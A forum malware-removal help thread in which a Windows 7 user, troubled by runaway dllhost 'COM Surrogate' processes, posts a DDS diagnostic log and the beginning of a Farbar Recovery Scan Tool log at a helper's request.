
Many dllhost 'COM Surrogate' processes eating mem & proc


  • This topic is locked
24 replies to this topic

#1 scooter2028


Posted 16 July 2014 - 08:37 AM

Thanks in advance for any help.

 

Many dllhost.exe ‘COM Surrogate’ processes are started and are eating up CPU and memory. After a while the system becomes unusable.

If I let it run, they will keep adding processes to at least 30 or maybe more. I have always killed them before any more could be initiated. When several are running, the system bogs down severely.

If I let the processes pile up for a while, eventually a popup will appear saying that my settings do not allow my download file to be downloaded. I didn't request a file.

 

After Googling, it seems that this is not an isolated problem but there doesn’t seem to be any one root cause. 

 

System Configuration:
Hardware:
   Dell Laptop ‘Studio XPS’ – XPS-1645
- 8 GB memory
- CPU: Intel Core i7 – Q 720 @ 1.60 GHz, 4 core, 8 logical processors

OS:
- MS Windows 7 Professional 64 bit, SP1
Network:
- Hardwired to LAN.

 

If the system is never connected to the network (boot without plugging in the Ethernet cable, and never plug in the cable while the system is up), the ‘COM Surrogate’ processes never start.

 

To run the DDS program, I let several of these processes start and then started DDS.  It ran to about 70% of the completion graph and wouldn't progress further.  A check of the task manager showed that it was getting time but very rarely.  I eventually killed the 'COM Surrogate's and DDS went about its business and finished in a reasonable time.

 

DDS.LOG

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17126
Run by Ric at 23:09:20 on 2014-07-15
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.8180.5344 [GMT -4:00]
.
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\STacSV64.exe
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\atieclxx.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Windows\system32\BtwRSupportService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe
C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
C:\Program Files\Carbonite\Carbonite Backup\carboniteservice.exe
C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapSvc.exe
C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\CLML_NTService\CLMLServer.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
C:\Program Files (x86)\PCPitstop\PCPitstopScheduleService.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe
C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLSched.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\svchost.exe -k bthsvcs
C:\Windows\system32\taskmgr.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\system32\wuauclt.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Roy\totalcmd\TOTALCMD64.EXE
C:\Windows\syswow64\dllhost.exe
C:\Kits\processexplorer\procexp.exe
C:\Users\Ric\AppData\Local\Temp\procexp64.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Windows\system32\taskeng.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = about:blank
uWindow Title = Internet Explorer, enhanced for Bing and MSN
uSearch Page = hxxp://www.google.com
uDefault_Search_URL = hxxp://www.google.com/ie
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
mWinlogon: Userinit = c:\windows\syswow64\userinit.exe,
BHO: AutorunsDisabled - <orphaned>
BHO: ContributeBHO Class: {074C1DC5-9320-4A9A-947D-C042949C6216} - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\IEPlugin\contributeieplugin.dll
BHO: MSS+ Identifier: {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} - C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll
BHO: Canon Easy-WebPrint EX BHO: {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Windows Live Messenger Companion Helper: {9FDDE16B-836F-4806-AB1F-1455CBEFF289} - C:\Program Files (x86)\Windows Live\Companion\companioncore.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
TB: Contribute Toolbar: {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\IEPlugin\contributeieplugin.dll
TB: Canon Easy-WebPrint EX: {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
EB: Canon Easy-WebPrint EX: {21347690-EC41-4F9A-8887-1F4AEE672439} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
dRunOnce: [{90140000-003D-0000-1000-0000000FF1CE}] C:\Windows\System32\cmd.exe /C del "C:\ProgramData\Microsoft Help\Rgstrtn.lck" /Q /A:H
StartupFolder: C:\Users\Ric\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\Dropbox.lnk - C:\Users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: Add to Google Photos Screensa&ver - C:\Windows\System32\GPhotos.scr/200
IE: E&xport to Microsoft Excel - C:\PROGRA~1\MICROS~1\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\PROGRA~1\MICROS~1\Office14\ONBttnIE.dll/105
IE: Send image to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
IE: {0000036B-C524-4050-81A0-243669A86B9F} - {B63DBA5F-523F-4B9C-A43D-65DF1977EAD3} - C:\Program Files (x86)\Windows Live\Companion\companioncore.dll
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
Trusted Zone: dell.com
DPF: {49312E18-AA92-4CC2-BB97-55DEA7BCADD6} - hxxps://support.dell.com/systemprofiler/SysProExe.CAB
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_27-windows-i586.cab
DPF: {C1F8FC10-E5DB-4112-9DBF-6C3FF728D4E3} - hxxp://support.dell.com/systemprofiler/DellSystemLite.CAB
DPF: {CAFEEFAC-0016-0000-0027-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_27-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_27-windows-i586.cab
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
DPF: {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} - hxxps://akamaicdn.webex.com/client/WBXclient-T28L10NSP12_CP1-16851/webex/ieatgpc1.cab
DPF: {FFB3A759-98B1-446F-BDA9-909C6EB18CC7} - hxxp://utilities.pcpitstop.com/Optimize3/pcpitstop2.dll
TCP: NameServer = 192.168.0.1 205.171.3.26 205.171.2.26
TCP: Interfaces\{37C5C989-2D63-4637-9E1A-CD88A377A001} : DHCPNameServer = 192.168.0.1 205.171.3.26 205.171.2.26
TCP: Interfaces\{37C5C989-2D63-4637-9E1A-CD88A377A001}\14355535 : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{37C5C989-2D63-4637-9E1A-CD88A377A001}\349647275737F534162746 : DHCPNameServer = 192.168.2.1
TCP: Interfaces\{37C5C989-2D63-4637-9E1A-CD88A377A001}\3547F6E65634275656B6F52416C6C627F6F6D6 : DHCPNameServer = 192.168.1.6
TCP: Interfaces\{37C5C989-2D63-4637-9E1A-CD88A377A001}\960586F6E656 : DHCPNameServer = 172.20.10.1
TCP: Interfaces\{37C5C989-2D63-4637-9E1A-CD88A377A001}\C696E6B637973733530313 : DHCPNameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{BCEEFB74-CBB0-43F6-BDE1-FB9F73661BA6} : DHCPNameServer = 198.224.180.135 198.224.179.135
TCP: Interfaces\{DE5F349B-1D1E-493C-8659-F280744843FB} : DHCPNameServer = 192.168.0.1 205.171.3.26 205.171.2.26
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.153\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: AutorunsDisabled - <orphaned>
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
x64-DPF: {49312E18-AA92-4CC2-BB97-55DEA7BCADD6} - hxxps://support.dell.com/systemprofiler/SysProExe.CAB
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: AutorunsDisabled - <no file>
x64-SSODL: WebCheck - <orphaned>
.
============= SERVICES / DRIVERS ===============
.
R0 PxHlpa64;PxHlpa64;C:\Windows\System32\drivers\PxHlpa64.sys [2011-2-26 55856]
R0 Sahdad64;HDD Filter Driver;C:\Windows\System32\drivers\Sahdad64.sys [2012-7-6 27120]
R0 Saibad64;Volume Filter Driver;C:\Windows\System32\drivers\Saibad64.sys [2012-7-6 19952]
R1 SaibVdAd64;Virtual Disk Driver;C:\Windows\System32\drivers\SaibVdAd64.sys [2012-7-6 27632]
R2 9734BF6A-2DCD-40f0-BAB0-5AAFEEBE1269;Roxio SAIB Service;C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe [2009-6-2 457200]
R2 AESTFilters;Andrea ST Filters Service;C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe [2014-6-16 89600]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\System32\atiesrxx.exe [2011-2-25 202752]
R2 BcmBtRSupport;Bluetooth Driver Management Service;C:\Windows\System32\BtwRSupportService.exe [2013-10-28 2255064]
R2 BOT4Service;BOT4Service;C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe [2010-7-14 32240]
R2 Fitbit Connect;Fitbit Connect Service;C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [2014-5-19 1436192]
R2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2011-2-26 13336]
R2 PCPitstop Scheduling;PCPitstop Scheduling;C:\Program Files (x86)\PCPitstop\PCPitstopScheduleService.exe [2011-3-25 86016]
R2 QDLService2kDell;Qualcomm Gobi 2000 Download Service (Dell);C:\Program Files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe [2010-1-14 330488]
R2 rimspci;rimspci;C:\Windows\System32\drivers\rimspe64.sys [2011-2-25 60416]
R2 risdpcie;risdpcie;C:\Windows\System32\drivers\risdpe64.sys [2011-2-25 80896]
R2 rixdpcie;rixdpcie;C:\Windows\System32\drivers\rixdpe64.sys [2011-2-25 55808]
R2 TurboB;Turbo Boost UI Monitor driver;C:\Windows\System32\drivers\TurboB.sys [2009-11-2 13784]
R2 WMCoreService;Mobile Broadband Service;C:\Program Files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe servicemode --> C:\Program Files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe servicemode [?]
R3 bcbtums;Bluetooth USB LD Filter;C:\Windows\System32\drivers\bcbtums.sys [2013-10-28 170712]
R3 btwampfl;btwampfl;C:\Windows\System32\drivers\btwampfl.sys [2013-10-2 166104]
R3 btwl2cap;Bluetooth L2CAP Service;C:\Windows\System32\drivers\btwl2cap.sys [2011-2-25 35104]
R3 CtClsFlt;Creative Camera Class Upper Filter Driver;C:\Windows\System32\drivers\CtClsFlt.sys [2011-2-26 172704]
R3 ITECIRfilter;ITECIR Filter Driver;C:\Windows\System32\drivers\ITECIRfilter.sys [2011-3-22 28264]
R3 k57nd60a;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;C:\Windows\System32\drivers\k57nd60a.sys [2009-6-10 270848]
R3 netw5v64;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 64 Bit;C:\Windows\System32\drivers\netw5v64.sys [2009-6-10 5434368]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 RoxWatch12;Roxio Hard Drive Watcher 12;C:\Program Files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatch13.exe [2010-7-16 354288]
S3 btusbflt;Bluetooth USB Filter;C:\Windows\System32\drivers\btusbflt.sys [2010-4-14 54824]
S3 BVRPMPR5a64;BVRPMPR5a64 NDIS Protocol Driver;C:\Windows\System32\drivers\BVRPMPR5a64.SYS [2011-11-20 35840]
S3 fssfltr;fssfltr;C:\Windows\System32\drivers\fssfltr.sys [2011-2-26 48488]
S3 fsssvc;Windows Live Family Safety Service;C:\Program Files (x86)\Windows Live\Family Safety\fsssvc.exe [2010-9-23 1493352]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2014-6-11 111616]
S3 McComponentHostService;McAfee Security Scan Component Host Service;C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [2014-4-9 289256]
S3 Netaapl;Apple Mobile Device Ethernet Service;C:\Windows\System32\drivers\netaapl64.sys [2011-5-10 22528]
S3 ose64;Office 64 Source Engine;C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2010-1-9 174440]
S3 qrkis;Tether Miniport;C:\Windows\System32\drivers\qrkis.sys [2011-2-26 50856]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\System32\drivers\rdpvideominiport.sys [2013-2-18 19456]
S3 RoxMediaDB13;RoxMediaDB13;C:\Program Files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe [2010-7-16 1099248]
S3 StorSvc;Storage Service;C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-13 27136]
S3 SwitchBoard;Adobe SwitchBoard;C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [2010-2-19 517096]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2014-4-9 56832]
S3 TurboBoost;TurboBoost;C:\Program Files\Intel\TurboBoost\TurboBoost.exe [2009-11-2 126352]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2011-2-25 1255736]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== File Associations ===============
.
ShellExec: dreamweaver.exe: Open="C:\Program Files (x86)\Adobe\Adobe Dreamweaver CS5\dreamweaver.exe", "%1"
.
=============== Created Last 30 ================
.
2014-07-14 16:08:07 -------- d-----w- C:\Windows\SysWow64\wbem\Performance
2014-07-14 15:20:30 -------- d-----w- C:\RegBackup
2014-07-14 13:20:32 -------- d-----w- C:\Program Files (x86)\Tweaking.com
2014-07-11 19:19:20 -------- d-----w- C:\Windows\ERUNT
2014-07-11 18:58:13 -------- d-----w- C:\Kits
2014-07-06 18:20:26 536576 ----a-w- C:\Windows\SysWow64\sqlite3.dll
2014-07-06 18:17:32 -------- d-----w- C:\AdwCleaner
2014-07-06 18:15:18 -------- d-----w- C:\Users\Ric\AppData\Local\GHISLER
2014-07-06 15:47:19 122584 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-07-06 15:46:49 91352 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-07-06 15:46:49 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2014-07-06 15:46:49 25816 ----a-w- C:\Windows\System32\drivers\mbam.sys
2014-07-06 15:46:49 -------- d-----w- C:\ProgramData\Malwarebytes
2014-07-06 15:46:49 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-07-05 16:52:15 -------- d-----w- C:\Roy
2014-06-25 23:54:59 -------- d-----w- C:\Users\Ric\AppData\Roaming\Feeqvena
2014-06-25 23:50:51 -------- d-----w- C:\ProgramData\IculOnse
2014-06-18 13:49:30 -------- d-----w- C:\ProgramData\Package Cache
2014-06-18 13:48:35 -------- d-----w- C:\TDSSKiller_Quarantine
2014-06-18 13:47:02 -------- d-----w- C:\AMD
2014-06-16 13:54:24 -------- d-----w- C:\Users\Ric\AppData\Roaming\WMCore
2014-06-16 13:53:48 -------- d-----w- C:\Users\Ric\AppData\Roaming\WirelessManager
2014-06-16 13:38:37 -------- d-----w- C:\ProgramData\QUALCOMM
2014-06-16 13:38:37 -------- d-----w- C:\Program Files (x86)\QUALCOMM
2014-06-16 13:38:24 -------- d-----w- C:\Windows\Dell
2014-06-16 13:37:05 41280 ----a-w- C:\Windows\System32\drivers\PCASp50a64.sys
2014-06-16 13:36:38 -------- d-----w- C:\ProgramData\Novatel Wireless
2014-06-16 13:24:41 -------- d-----w- C:\Users\Ric\New folder
2014-06-16 13:24:30 -------- d-----w- C:\Users\Ric\Dell Downloads
2014-06-16 13:12:25 -------- d-----w- C:\Program Files\My Dell
2014-06-16 13:09:36 -------- d-----w- C:\temp
.
==================== Find3M  ====================
.
2014-06-13 13:38:17 71344 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-06-13 13:38:17 699056 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2014-06-03 20:51:18 18960 ----a-w- C:\Windows\System32\drivers\LNonPnP.sys
2014-05-30 10:02:37 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2014-05-30 10:02:09 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2014-05-30 09:39:43 548352 ----a-w- C:\Windows\System32\vbscript.dll
2014-05-30 09:39:23 66048 ----a-w- C:\Windows\System32\iesetup.dll
2014-05-30 09:38:29 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2014-05-30 09:21:23 139264 ----a-w- C:\Windows\System32\ieUnatt.exe
2014-05-30 09:21:05 111616 ----a-w- C:\Windows\System32\ieetwcollector.exe
2014-05-30 09:20:36 752640 ----a-w- C:\Windows\System32\jscript9diag.dll
2014-05-30 09:11:24 940032 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2014-05-30 09:08:22 5782528 ----a-w- C:\Windows\System32\jscript9.dll
2014-05-30 09:02:39 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2014-05-30 08:55:36 38400 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2014-05-30 08:44:28 455168 ----a-w- C:\Windows\SysWow64\vbscript.dll
2014-05-30 08:43:06 61952 ----a-w- C:\Windows\SysWow64\iesetup.dll
2014-05-30 08:42:16 51200 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2014-05-30 08:28:33 112128 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2014-05-30 08:27:56 592896 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2014-05-30 08:24:19 1249280 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2014-05-30 08:23:22 2040832 ----a-w- C:\Windows\System32\inetcpl.cpl
2014-05-30 08:10:46 32256 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2014-05-30 07:56:56 2266112 ----a-w- C:\Windows\System32\wininet.dll
2014-05-30 07:56:50 4244992 ----a-w- C:\Windows\SysWow64\jscript9.dll
2014-05-30 07:50:09 1068032 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2014-05-30 07:49:38 1964544 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2014-05-30 07:21:10 1790976 ----a-w- C:\Windows\SysWow64\wininet.dll
2014-05-09 06:14:03 477184 ----a-w- C:\Windows\System32\aepdu.dll
2014-05-09 06:11:23 424448 ----a-w- C:\Windows\System32\aeinv.dll
2014-05-08 09:32:11 3178496 ----a-w- C:\Windows\System32\rdpcorets.dll
2014-05-08 09:32:11 16384 ----a-w- C:\Windows\System32\RdpGroupPolicyExtension.dll
2014-04-25 02:34:59 801280 ----a-w- C:\Windows\System32\usp10.dll
2014-04-25 02:06:17 626688 ----a-w- C:\Windows\SysWow64\usp10.dll
.
============= FINISH: 23:25:09.20 ===============

 

 

 

 

 


#2 aharonov


Posted 16 July 2014 - 09:26 AM

Hi there,

please run a FRST scan:


Please download Farbar Recovery Scan Tool and save it to your Desktop.
  • Start FRST with administrator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.


#3 scooter2028


Posted 16 July 2014 - 10:25 AM

The FRST.txt

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 15-07-2014 01
Ran by Ric (administrator) on DELL-XPS-1645 on 16-07-2014 10:53:41
Running from C:\Users\Ric\Desktop
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\stacsv64.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Broadcom Corporation.) C:\Windows\System32\BtwRSupportService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Carbonite, Inc. (www.carbonite.com)) C:\Program Files\Carbonite\Carbonite Backup\CarboniteService.exe
() C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapSvc.exe
(Cyberlink) C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\CLML_NTService\CLMLServer.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
() C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(PC Pitstop LLC) C:\Program Files (x86)\PCPitstop\PCPitstopScheduleService.exe
(QUALCOMM, Inc.) C:\Program Files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe
(Dropbox, Inc.) C:\Users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
() C:\Program Files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
() C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLSched.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
